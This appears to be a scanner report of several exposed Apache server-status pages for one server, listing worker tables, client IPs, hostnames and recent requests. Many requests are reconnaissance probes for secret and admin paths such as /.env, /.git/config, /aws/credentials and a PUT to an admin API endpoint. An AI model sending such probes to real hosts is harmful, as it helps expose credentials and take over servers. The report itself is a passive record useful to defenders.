/wp-cron.php?doing_wp_cron=1670426375.69888591766357421875 4-824418090/1008/6408_ 49.21001883520.024.08152.33 164.92.143.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 4-824418090/1003/6361_ 47.770251905850.026.77155.29 164.92.143.142http/1.1 4-824418090/999/6408_ 48.1034701981960.023.56145.89 185.74.5.84http/1.1tandemsl.com:443GET /.env HTTP/1.1 4-824418090/1014/6370_ 49.0634801984080.023.48163.30 183.136.225.32http/1.17f7ffb32-1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a85802624010e4
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Mar 24 2022 17:33:25 Current Time: Sunday, 27-Nov-2022 07:13:49 CET Restart Time: Friday, 25-Nov-2022 14:38:37 CET Parent Server Config. Generation: 7 Parent Server MPM Generation: 6 Server uptime: 1 day 16 hours 35 minutes 12 seconds Server load: 0.00 0.02 0.00 Total accesses: 3412 - Total Traffic: 13.9 MB - Total Duration: 81479 CPU Usage: u11.23 s16.45 cu94.37 cs126.31 - .17% CPU load .0234 requests/sec - 99 B/second - 4269 B/request - 23.8801 ms/request 4 requests currently being processed, 46 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02212972no0yes010000 12213104no0yes28000 22212973no0yes010000 32212974no0yes19000 42212975no0yes19000 Sum500 446000 __________R________R____________W___________R_____ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-622129720/1/67_ 3.07746016600.00.010.43 44.203.160.191http/1.1 0-622129720/0/62_ 0.0074359327490.00.000.26 44.203.160.191http/1.1 0-622129720/0/67_ 0.00745023440.00.000.38 44.203.160.191http/1.1 0-622129720/0/62_ 0.007453319100.00.000.52 44.203.160.191http/1.1 0-622129720/0/65_ 0.0074722125860.00.000.44 44.203.160.191http/1.1 0-622129720/0/65_ 0.00743118640.00.000.60 44.203.160.191http/1.1 0-622129720/0/62_ 0.00748315000.00.000.26 44.203.160.191http/1.1 0-622129720/0/62_ 0.000289770.00.000.27 139.144.69.48http/1.1 0-622129720/0/65_ 0.0074815621370.00.000.26 44.203.160.191http/1.1 0-622129720/0/60_ 0.000017390.00.000.29 139.144.69.48http/1.1 1-622131040/6/125W 3.1000165090.00.030.68 139.144.69.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-622131040/2/124_ 2.78022227300.00.010.62 44.203.160.191http/1.1 1-622131040/3/122_ 3.820022720.00.020.52 139.144.69.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 1-622131040/5/109_ 3.65018630230.00.020.41 194.99.104.35http/1.1tandemsl.com:443POST /xmlrpc.php HTTP/1.1 1-622131040/2/122_ 2.340126550.00.010.55 139.144.69.48http/1.1 1-622131040/5/125_ 2.670130270.00.020.94 139.144.69.48http/1.1 1-622131040/2/119_ 3.020186880.00.010.51 139.144.69.48http/1.1 1-622131040/7/125_ 3.810029830.00.040.48 139.144.69.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcHELP 1-622131040/2/132_ 3.69017029420.00.030.58 139.144.69.48http/1.1 1-622131040/3/129R 3.79272527280.00.010.55 139.144.69.48http/1.1 2-622129730/2/34_ 3.6700330.00.010.07 139.144.69.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-622129730/0/33_ 0.0074314890.00.000.06 44.203.160.191http/1.1 2-622129730/0/31_ 0.00749691890.00.000.05 44.203.160.191http/1.1 2-622129730/1/34_ 2.247490840.00.010.08 44.203.160.191http/1.1 2-622129730/0/30_ 0.0074831440.00.000.05 44.203.160.191http/1.1 2-622129730/0/32_ 0.0074420380.00.000.06 44.203.160.191http/1.1 2-622129730/0/37_ 0.000205750.00.000.09 139.144.69.48http/1.1 2-622129730/0/33_ 0.007470150.00.000.05 44.203.160.191http/1.1 2-622129730/0/31_ 0.007430230.00.000.06 44.203.160.191http/1.1 2-622129730/0/32_ 0.00745281040.00.000.07 44.203.160.191http/1.1 3-622129740/1/82_ 3.78005450.00.010.26 139.144.69.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /?rest_route=/wp/v2/users/ HTTP/1.1 3-622129740/1/83_ 0.860111270.00.130.35 139.144.69.48http/1.1 3-622129740/1/85W 2.290018870.00.010.25 139.144.69.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-622129740/1/89_ 0.5974308400.00.010.34 44.203.160.191http/1.1 3-622129740/2/83_ 3.66399016190.00.010.21 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1669529230.16174411773681640625 3-622129740/0/88_ 0.0039915510.00.000.31 44.203.160.191http/1.1 3-622129740/2/77_ 3.78003590.00.010.27 139.144.69.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPUT /api/v2/cmdb/system/admin/admin HTTP/1.1 3-622129740/0/86_ 0.000710270.00.000.32 139.144.69.48http/1.1 3-622129740/1/86_ 3.78006830.00.010.32 139.144.69.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 3-622129740/2/82_ 3.780012150.00.010.19 139.144.69.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-622129750/4/36_ 3.49539278120.00.030.08 44.203.160.191http/1.1 4-622129750/3/41_ 3.8600800.00.010.07 139.144.69.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 4-622129750/5/38_ 3.86003430.00.040.09 139.144.69.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 4-622129750/4/37_ 3.705422714520.00.080.12 62.102.148.154http/1.1tandemsl.com:443POST /xmlrpc.php HTTP/1.1 4-622129750/3/38R 3.7054202620.00.010.12 139.144.69.48http/1.1 4-622129750/2/35_ 3.055420180.00.010.06 44.203.160.191http/1.1 4-622129750/3/41_ 2.69542342910.00.020.09 44.203.160.191http/1.1 4-622129750/2/34_ 3.2354227650.00.010.06 44.203.160.191http/1.1 4-622129750/3/39_ 3.705394976180.00.020.06 93.114.185.76http/1.1tandemsl.com:443POST /wp-login.php HTTP/1.1 4-622129750/2/36_ 2.96024430.00.100.15 139.144.69.48http/1.1 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request DurSum of milliseconds required to process all requests ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot SSL/TLS Session Cache Status: cache type: SHMCB, shared memory: 512000 bytes, current entries: 28subcaches: 32, indexes per subcache: 88time lef
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a858027b9e84ef
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Mar 24 2022 17:33:25 Current Time: Saturday, 19-Nov-2022 14:42:57 CET Restart Time: Friday, 11-Nov-2022 03:17:59 CET Parent Server Config. Generation: 21 Parent Server MPM Generation: 20 Server uptime: 8 days 11 hours 24 minutes 57 seconds Server load: 0.00 0.00 0.00 Total accesses: 219931 - Total Traffic: 6.1 GB - Total Duration: 4798209 CPU Usage: u370.74 s428.28 cu271.72 cs324.79 - .191% CPU load .3 requests/sec - 8.7 kB/second - 28.9 kB/request - 21.8169 ms/request 4 requests currently being processed, 46 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02065225no0yes010000 11998050no0yes010000 21998051no0yes010000 31998052no0yes010000 42066545no0yes46000 Sum500 446000 ___________________________________________RW_RR__ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-2020652250/1586/5947_ 77.3143301341200.039.21158.12 114.119.153.253http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ingenieria-hse/permisos-de-obra/ HTTP/1.1 0-2020652250/1568/5938_ 77.43001308160.052.18192.45 185.3.94.68http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-2020652250/1607/5954_ 77.15001394180.047.06211.69 51.178.207.154http/1.1 0-2020652250/1629/5963_ 77.43011439410.045.34206.28 185.3.94.68http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcHELP 0-2020652250/1581/5932_ 76.7943301474310.043.46177.88 40.77.167.57http/1.1 0-2020652250/1594/5995_ 77.0965801459230.052.83204.93 114.119.153.245http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /wp-content/uploads/2020/04/Nota-informativa-Medidas-econom 0-2020652250/1621/5933_ 76.57001544390.054.47187.06 185.3.94.68http/1.1 0-2020652250/1616/5917_ 77.1665801603060.066.73191.85 207.46.13.213http/1.1relehse.com:443GET /admin_layout/bootstrap/css/bootstrap.min.css HTTP/1.1 0-2020652250/1594/5944_ 77.18001302580.044.92177.31 185.3.94.68http/1.1 0-2020652250/1600/5902_ 77.2366101260850.038.87177.20 141.255.166.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-2019980500/2699/3124_ 207.1400362090.067.9477.45 185.3.94.68http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-2019980500/2687/3092_ 207.1400757440.077.3590.66 185.3.94.68http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 1-2019980500/2688/3090_ 207.1400453380.083.7591.76 185.3.94.68http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-2019980500/2683/3092_ 200.448980490400.081.2090.72 207.46.13.213http/1.1 1-2019980500/2691/3103_ 205.8043270521610.077.5585.03 109.237.98.226http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /aws/credentials HTTP/1.1 1-2019980500/2721/3150_ 207.1300442670.075.1288.33 185.3.94.68http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 1-2019980500/2724/3122_ 200.4582230497710.068.8577.25 164.52.36.229http/1.1 1-2019980500/2687/3116_ 207.1401815100.076.0290.57 185.3.94.68http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /?rest_route=/wp/v2/users/ HTTP/1.1 1-2019980500/2688/3094_ 206.859000524420.067.6276.65 207.46.13.213http/1.1relehse.com:443GET /admin_layout/assets/css/responsive.css HTTP/1.1 1-2019980500/2677/3094_ 200.4543270440810.075.9893.52 109.237.98.226http/1.1 2-2019980510/2603/2921_ 184.8983490378960.068.0583.76 49.12.184.111http/1.1 2-2019980510/2620/2944_ 189.9843260425660.078.2785.08 109.237.98.226http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /test.php HTTP/1.1 2-2019980510/2633/2972_ 189.9843270510440.077.7185.65 109.237.98.226http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.aws/config HTTP/1.1 2-2019980510/2634/2965_ 187.9143270364790.058.5565.05 109.237.98.226http/1.1 2-2019980510/2653/2980_ 188.8700446790.067.3774.08 185.3.94.68http/1.1 2-2019980510/2642/2962_ 190.8820681545610.068.8478.45 34.96.143.131http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /wp-login.php HTTP/1.1 2-2019980510/2631/2971_ 184.8843250421710.074.2682.58 109.237.98.226http/1.1 2-2019980510/2645/2966_ 187.1082221456980.070.6077.38 164.52.36.229http/1.1 2-2019980510/2610/2921_ 184.8820680491470.075.4882.21 34.96.143.131http/1.1 2-2019980510/2643/2971_ 188.87834920324580.067.7375.68 49.12.184.111http/1.1relehse.com:443GET /wp-content HTTP/1.1 3-2019980520/3211/3850_ 200.098430865740.078.5795.24 181.48.193.182http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-2019980520/3183/3819_ 199.14347301047650.082.43100.00 194.9.191.20http/1.1 3-2019980520/3212/3853_ 200.127610880360.083.5295.89 114.119.153.25http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /wp-content/uploads/2020/04/Nota-informativa-Medidas-urgent 3-2019980520/3208/3848_ 199.30347319783120.078.3095.34 194.9.191.20http/1.1relehse.com:443GET /login HTTP/1.1 3-2019980520/3231/3846_ 200.32142907560.093.64104.99 178.20.156.80http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /wp-login.php HTTP/1.1 3-2019980520/3196/3843_ 199.208431742750.081.7894.46 181.48.193.182http/1.1 3-2019980520/3221/3831_ 200.3300836780.078.6895.94 185.3.94.68http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.DS_Store HTTP/1.1 3-2019980520/3186/3836_ 197.83020700060.085.19102.85 185.3.94.68http/1.1 3-2019980520/3221/3879_ 199.28140903960.078.7394.33 178.20.156.80http/1.1 3-2019980520/3217/3871_ 199.237611915660.089.08103.91 37.140.192.145http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /wp-login.php HTTP/1.1 4-2020665450/1528/6151_ 75.14001505460.037.89153.66 185.3.94.68http/1.1 4-2020665450/1482/6145_ 75.10001723850.033.39183.20 185.3.94.68http/1.1 4-2020665450/1494/6151_ 75.14001385230.036.34161.53 185.3.94.68http/1.1 4-2020665450/1513/6143R 75.361401457420.041.85164.94 178.20.156.80http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /wp-login.php HTTP/1.1 4-2020665450/1466/6101W 75.17001647850.035.51174.31 185.3.94.68http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-2020665450/1518/6153_ 75.11001366290.035.21151.45 185.3.94.68http/1.1 4-2020665450/1492/6170R 75.13001675530.032.72181.53 185.3.94.68http/1.1 4-2020665450/1468/6131R 75.131401511990.049.53183.62 178.20.156.80http/1.1 4-2020665450/1507/6140_ 75.38001813020.041.34159.53 185.3.94.68http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPUT /api/v2/cmdb/system/admin/admin HTTP/1.1 4-2020665450/1468/6095_ 75.14001511550.0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a85802e46f4bb4
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Mar 24 2022 17:33:25 Current Time: Friday, 04-Nov-2022 15:10:09 CET Restart Time: Thursday, 25-Aug-2022 11:36:20 CEST Parent Server Config. Generation: 85 Parent Server MPM Generation: 84 Server uptime: 71 days 4 hours 33 minutes 49 seconds Server load: 0.00 0.00 0.00 Total accesses: 1551954 - Total Traffic: 65.1 GB - Total Duration: 58291642 CPU Usage: u175.1 s262.48 cu5031.47 cs5692.97 - .181% CPU load .252 requests/sec - 11.1 kB/second - 44.0 kB/request - 37.5602 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01837366no1yes010000 11837233no0yes010000 21837235no0yes010000 31837232no0yes19000 41837234no0yes010000 Sum501 149000 ______________________________________W___________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-8418373660/523/24510_ 16.34007686040.012.19836.18 164.92.224.29http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 0-8418373660/523/24559_ 16.100187761530.016.24822.77 164.92.224.29http/1.1 0-8418373660/527/24552_ 16.34007311210.010.88859.24 164.92.224.29http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 0-8418373660/540/24341_ 16.2411187650960.012.71762.44 193.22.205.73http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 0-8418373660/529/24551_ 16.34007151010.010.04822.61 164.92.224.29http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 0-8418373660/544/24597_ 16.2925217141330.011.25793.44 193.22.205.73http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 0-8418373660/530/24528_ 16.34007120700.012.53744.07 164.92.224.29http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-8418373660/533/24659_ 16.3314217248030.012.08841.46 193.22.205.73http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 0-8418373660/507/24551_ 16.3011207317820.012.17813.53 193.22.205.73http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 0-8418373660/531/24516_ 16.34007486340.011.06775.52 164.92.224.29http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.DS_Store HTTP/1.1 1-8418372330/266/35155_ 12.37692014401710.05.131379.67 193.22.205.73http/1.1relehse.com:443GET /admin_layout/assets/css/plugins/jquery-ui.css HTTP/1.1 1-8418372330/258/35085_ 12.37692014399300.07.301463.21 193.22.205.73http/1.1relehse.com:443GET /admin_layout/assets/css/fontawesome/font-awesome.min.css H 1-8418372330/269/35324_ 12.37692013975580.06.411483.63 193.22.205.73http/1.1relehse.com:443GET /admin_layout/assets/css/plugins/select2.css HTTP/1.1 1-8418372330/268/35110_ 12.37692013441760.06.861602.89 193.22.205.73http/1.1relehse.com:443GET /admin_layout/assets/css/plugins/bootstrap-wysihtml5.css HT 1-8418372330/263/35307_ 12.580014403550.07.231495.11 164.92.224.29http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /?rest_route=/wp/v2/users/ HTTP/1.1 1-8418372330/261/35170_ 11.94689013798920.05.951425.62 109.237.98.226http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /aws/credentials HTTP/1.1 1-8418372330/253/35156_ 11.940014112540.05.681505.35 164.92.224.29http/1.1 1-8418372330/253/35182_ 9.230113805780.05.781653.14 164.92.224.29http/1.1 1-8418372330/261/35182_ 10.460514153880.06.991594.21 164.92.224.29http/1.1 1-8418372330/263/35143_ 9.23689014003410.06.841543.50 109.237.98.226http/1.1 2-8418372350/515/28846_ 15.300010853030.010.031411.01 164.92.224.29http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-8418372350/510/28699_ 15.2401810572380.011.071350.08 164.92.224.29http/1.1 2-8418372350/504/28789_ 15.1702211187170.012.161366.04 164.92.224.29http/1.1 2-8418372350/511/28590_ 15.2611621111723140.014.001508.63 40.122.149.171http/1.1tandemsl.com:443POST /xmlrpc.php HTTP/1.1 2-8418372350/497/28768_ 15.221162110418280.012.531311.99 193.22.205.73http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 2-8418372350/507/28709_ 15.1602310526570.09.581464.40 164.92.224.29http/1.1 2-8418372350/488/28841_ 15.191341810465200.09.951469.21 193.22.205.73http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 2-8418372350/506/28793_ 15.251373610819400.014.391371.59 193.22.205.73http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 2-8418372350/502/28766_ 15.080010864590.010.461409.28 164.92.224.29http/1.1 2-8418372350/505/28807_ 15.151342010238750.09.981314.33 193.22.205.73http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 3-8418372320/248/31230_ 12.270011474000.04.651227.93 164.92.224.29http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-8418372320/255/31112_ 12.08451011471750.06.421223.65 193.22.205.73http/1.1relehse.com:443GET /admin_layout/assets/css/plugins/typeahead.css HTTP/1.1 3-8418372320/246/31236_ 12.270012707160.05.541337.19 164.92.224.29http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 3-8418372320/258/31203_ 12.15451111614200.06.571229.24 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1667570558.64229893684387207031 3-8418372320/248/31266_ 12.08683011587940.04.681232.35 193.22.205.73http/1.1relehse.com:443GET /admin_layout/plugins/wysiwyg-editor-bootstrap/src/css/wysi 3-8418372320/247/31299_ 12.08683011573730.05.311288.73 193.22.205.73http/1.1relehse.com:443GET /admin_layout/plugins/datatables/dataTables.bootstrap.min.c 3-8418372320/250/31158_ 12.270011972830.07.301239.22 164.92.224.29http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPUT /api/v2/cmdb/system/admin/admin HTTP/1.1 3-8418372320/253/31212_ 12.270011222390.06.771258.86 164.92.224.29http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /info.php HTTP/1.1 3-8418372320/246/31174W 12.080011898920.06.801277.45 164.92.224.29http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-8418372320/261/31374_ 12.08686011934610.06.551410.79 193.22.205.73http/1.1relehse.com:443GET /admin_layout/plugins/datatables/jquery.dataTables.min.js H 4-8418372340/290/35406_ 12.44347014375120.06.661653.79 116.18.229.205http/1.1 4-8418372340/311/35435_ 12.552912014559380.07.241705.55 193.22.205.73http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 4-8418372340/303/35529_ 12.44288014545950.06.351685.79 193.22.205.73http/1.1relehse.com:443GET /admin_layout/plugins/outlook/auth.js HTTP/1.1 4-8418372340/306/35629_ 12.440013817330.07.671646.06 164.92.224.29http/1.1 4-8418372340/301/35375_ 12.44288014480720.09.511612.16 193.22.205.73http/1.1relehse.com:443GET /admin_layout/assets/img/sidebar/sidebar-divider-dots.png H 4-8418372340/317/35450_ 12.440013877620.07.371730.59 164.92.224.29http/1.1 4-8418372340/301/35542_ 12.543481514574710.07.151650.03 116.18.229.205http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a858021fc0dc4a
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Mar 24 2022 17:33:25 Current Time: Sunday, 16-Oct-2022 19:11:33 CEST Restart Time: Thursday, 25-Aug-2022 11:36:20 CEST Parent Server Config. Generation: 24 Parent Server MPM Generation: 23 Server uptime: 52 days 7 hours 35 minutes 13 seconds Server load: 0.06 0.04 0.01 Total accesses: 1236936 - Total Traffic: 56.6 GB - Total Duration: 48471326 CPU Usage: u138.35 s211.29 cu3770.16 cs4227.43 - .185% CPU load .274 requests/sec - 13.1 kB/second - 48.0 kB/request - 39.1866 ms/request 11 requests currently being processed, 39 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01492132no0yes010000 11492264no0yes37000 21492133no0yes010000 31492135no0yes010000 41492134no0yes82000 Sum500 1139000 __________R_______WW____________________RRRRRR_R_R Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-2314921320/4/18245_ 8.961053206165980.00.06669.95 195.178.120.231http/1.1 0-2314921320/4/18252_ 16.39006186770.00.10614.50 143.198.98.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPUT /api/v2/cmdb/system/admin/admin HTTP/1.1 0-2314921320/4/18269_ 5.291328405672740.00.06634.60 45.33.80.243http/1.1 0-2314921320/2/18090_ 13.021206016199490.00.01596.74 40.77.139.2http/1.1relehse.com:443GET /admin_layout/assets/css/plugins/daterangepicker.css HTTP/1 0-2314921320/3/18339_ 13.021206005617440.00.06661.75 40.77.139.2http/1.1relehse.com:443GET /admin_layout/assets/css/plugins/fullcalendar.css HTTP/1.1 0-2314921320/5/18332_ 13.021206005460890.00.10621.68 40.77.139.2http/1.1relehse.com:443GET /admin_layout/assets/css/plugins/nprogress.css HTTP/1.1 0-2314921320/3/18237_ 9.971205705513250.00.08561.75 176.123.4.92http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET http://103.23.61.80:80/myadmin/scripts/setup.php HTTP/1.0 0-2314921320/1/18320_ 5.1112043935476060.00.00639.57 178.62.249.141http/1.1 0-2314921320/3/18292_ 13.46105321145807270.00.01635.90 195.178.120.231http/1.1tandemsl.com:443GET /wp-content/plugins/ioptimization/index.php?rchk HTTP/1.1 0-2314921320/4/18237_ 13.46105321975958150.00.12602.62 195.178.120.231http/1.1tandemsl.com:443GET /wp-content/plugins/ioptimization/?rchk HTTP/1.1 1-2314922640/66/27677R 16.4899011599400.01.321172.70 143.198.98.135http/1.1 1-2314922640/58/27549_ 16.522011381820.01.091259.13 143.198.98.135http/1.1 1-2314922640/65/27734_ 16.251110791750.00.991278.39 143.198.98.135http/1.1 1-2314922640/55/27572_ 16.553010612610.00.871368.07 143.198.98.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcHELP 1-2314922640/65/27800_ 16.50316911010920.01.731305.15 66.249.69.186http/1.1tandemsl.com:443GET /favicon.ico HTTP/1.1 1-2314922640/62/27647_ 16.242011332150.01.031220.05 143.198.98.135http/1.1 1-2314922640/67/27649_ 16.522111282080.01.021304.45 143.198.98.135http/1.1 1-2314922640/56/27624_ 16.423110891770.01.201441.20 143.198.98.135http/1.1 1-2314922640/72/27675_ 16.560010905240.01.131341.26 143.198.98.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 1-2314922640/58/27551W 16.520011142390.01.431307.38 143.198.98.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-2314921330/56/22499_ 15.7616009116970.01.351215.95 107.167.39.74http/1.1 2-2314921330/60/22388_ 15.684252049138280.01.531191.92 51.178.207.154http/1.1 2-2314921330/64/22499_ 15.981601659332510.01.961211.54 107.167.39.74http/1.1tandemsl.com:443GET / HTTP/1.1 2-2314921330/57/22361_ 15.8411658748400.01.231324.17 143.198.98.135http/1.1 2-2314921330/48/22428_ 15.98160208653420.01.671150.55 107.167.39.74http/1.1relehse.com:443GET /login HTTP/1.1 2-2314921330/64/22409_ 15.66158348568000.01.701288.47 107.167.39.74http/1.1 2-2314921330/55/22579_ 13.81108421460.01.831311.19 143.198.98.135http/1.1 2-2314921330/61/22537_ 15.911298852090.01.351194.14 143.198.98.135http/1.1 2-2314921330/56/22412_ 15.98160209068040.02.701229.54 107.167.39.74http/1.1relehse.com:443GET / HTTP/1.1 2-2314921330/57/22506_ 13.354251078615320.01.531166.58 20.247.53.148http/1.1 3-2314921350/4/26280_ 12.310010402750.00.151101.51 143.198.98.135http/1.1 3-2314921350/7/26171_ 14.085149010544600.00.171101.79 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1665935144.73632502555847167968 3-2314921350/5/26281_ 13.1515825811650500.00.401224.43 107.167.39.74http/1.1 3-2314921350/6/26267_ 14.040010548750.00.101095.87 143.198.98.135http/1.1 3-2314921350/5/26323_ 15.35160010329930.00.201098.86 107.167.39.74http/1.1tandemsl.com:80GET / HTTP/1.1 3-2314921350/4/26316_ 12.315297010413440.00.281155.33 193.142.146.35http/1.1 3-2314921350/2/26238_ 4.7784517810641710.00.181107.26 72.14.185.165http/1.1 3-2314921350/7/26327_ 12.315149010231460.00.141129.37 40.77.139.2http/1.1relehse.com:443GET /admin_layout/assets/css/font/fontawesome-webfont.woff?v=3. 3-2314921350/5/26213_ 5.51845010452410.00.091154.01 5.181.86.250http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcSSH-2.0-libssh2_1.10.0 3-2314921350/2/26406_ 4.76514927510507100.00.091274.45 20.239.218.124http/1.1 4-2314921340/15/28933R 10.34158112036830.00.431466.84 107.167.39.74http/1.1 4-2314921340/10/29007R 14.14417619512262180.00.271514.76 143.198.98.135http/1.1 4-2314921340/13/29059R 12.60417614812047040.00.301498.31 148.72.211.177http/1.1tandemsl.com:443POST /wp-login.php HTTP/1.1 4-2314921340/13/29188R 12.6633027911950310.00.391493.34 213.152.161.133http/1.1tandemsl.com:443POST /xmlrpc.php HTTP/1.1 4-2314921340/16/28949R 15.14330112629940.00.521441.81 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1665939963.21685600280761718750 4-2314921340/16/28991R 11.8916013311933400.00.641581.58 40.77.167.99http/1.1 4-2314921340/19/29114_ 11.87112012509080.00.481459.34 66.249.69.184http/1.1 4-2314921340/15/29018R 15.18160011857190.00.481552.34 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1665940133.55333089828491210937 4-2314921340/11/29159_ 15.20114012034370.00.341593.33 